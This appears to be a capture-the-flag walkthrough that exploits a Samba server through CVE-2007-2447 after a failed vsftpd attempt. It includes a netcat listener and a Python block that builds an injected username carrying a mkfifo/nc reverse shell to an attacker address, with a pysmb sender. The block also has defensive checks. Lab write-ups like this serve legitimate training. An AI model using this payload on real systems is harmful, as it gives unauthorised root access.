Enumeration
Let's kick off with a port scan to get a better idea of our target. There are a couple of interesting finds here, so let's start digging!
FTP - port 21
FTP Exploit attempt
FTP allows anonymous login, but there is nothing in the hosted share.
Looking into the detected software, vsftpd 2.3.4, with searchsploit reveals these two known exploits.
However, when I try to run the exploit, it does not execute successfully. Which is a bummer, but let's move on to the other ports.
SMB - port 139, 445
Performing a deeper inspection of the open SMB ports, we are able to determine the software version. There are a number of known exploits when we dig into searchsploit for this version of Samba. I'm intentionally not using Metasploit, but we can look for a PoC for CVE-2007-2447 (command injection through Samba's "username map script" option: the username from the SMB session setup is handed to a shell unescaped, so backticks in it get executed by smbd).
We find this GitHub gem to do all the heavy lifting for us. Reviewing the code, it is a perfect Python reproduction of the Metasploit exploit! Love you amriunix <3
Exploitation
Let's prep for running the Python script:
python3 -m venv venv
source venv/bin/activate
pip install pysmb
And prepare our netcat listener:
nc -nlvp 1234
Now we run the exploit Python script and pray to the tech gods that it works.
Looking at our listener, we've got a shell, baby, and a root shell at that! That is expected: smbd runs the username map script as root, so the injected command inherits its privileges.
The root flag can be found at:
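To show what the script is actually doing, here is an added example (my own code, not amriunix's script or the page's) of the CVE-2007-2447 mechanism: the injected username format the public PoC sends, a harmless local stand-in that contrasts the vulnerable shell interpolation with the hardened argv form, a config check defenders can run over smb.conf, and a pysmb sender. The reverse-shell payload body, the fifo path, the attacker address and the sample smb.conf are constructed assumptions; the pysmb call is only needed when sending to a real target and is not executed offline.

```python
import subprocess

# CVE-2007-2447: affected Samba 3.0.x builds pass the SMB session-setup
# username to the configured "username map script" via /bin/sh without
# escaping. smbd runs as root, so backticks in the username run as root.


def build_malicious_username(lhost: str, lport: int) -> str:
    """Username in the format the public PoC uses: "/=" so the mapping
    parser is happy, then a backticked nohup'd reverse shell.
    The fifo-based payload body is an assumption, not the PoC's exact text."""
    payload = (
        "mkfifo /tmp/f; nc {lhost} {lport} 0</tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f"
    ).format(lhost=lhost, lport=lport)
    return "/=`nohup " + payload + "`"


def vulnerable_usermap(username: str) -> str:
    """Constructed stand-in for the buggy pattern: the username is pasted into
    a shell command line. The real map script is swapped for /bin/echo so the
    demo is harmless; with the real thing, the backticks run as root."""
    out = subprocess.run("/bin/echo " + username, shell=True,
                         capture_output=True, text=True)
    return out.stdout.strip()


def hardened_usermap(username: str) -> str:
    """Same call done safely: argv list, no shell, so backticks are just bytes."""
    out = subprocess.run(["/bin/echo", username],
                         capture_output=True, text=True)
    return out.stdout.strip()


def has_username_map_script(smb_conf_text: str) -> bool:
    """Defender-side check: the bug is only reachable when
    'username map script' is set (commented lines do not count)."""
    for raw in smb_conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        key = line.split("=", 1)[0].strip().lower()
        if key == "username map script":
            return True
    return False


def send_via_smb(rhost: str, rport: int, username: str) -> None:
    """Deliver the username in a session setup with pysmb (pip install pysmb).
    Not run offline; the session never completes, the command already ran."""
    from smb.SMBConnection import SMBConnection
    conn = SMBConnection(username, "", "", "")
    try:
        conn.connect(rhost, int(rport), timeout=5)
    except Exception:
        pass  # expected: the server never finishes authenticating us


if __name__ == "__main__":
    probe = "/=`echo INJECTED`"          # benign probe instead of the real payload
    print("vulnerable:", vulnerable_usermap(probe))   # /=INJECTED
    print("hardened:  ", hardened_usermap(probe))     # /=`echo INJECTED`
    # send_via_smb("10.10.10.3", 445, build_malicious_username("10.10.14.2", 1234))
```

The benign probe is the one to use when you want to confirm the injection point without touching the real payload; the difference between the two local functions is exactly why the page's exploit lands a root shell.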
cat /root/root.txt
Funnily enough, it was harder for me to find the user flag, but a cheeky find script did the trick.
And that's a wrap, folks. Now go touch some grass, but first look at my achievement thing!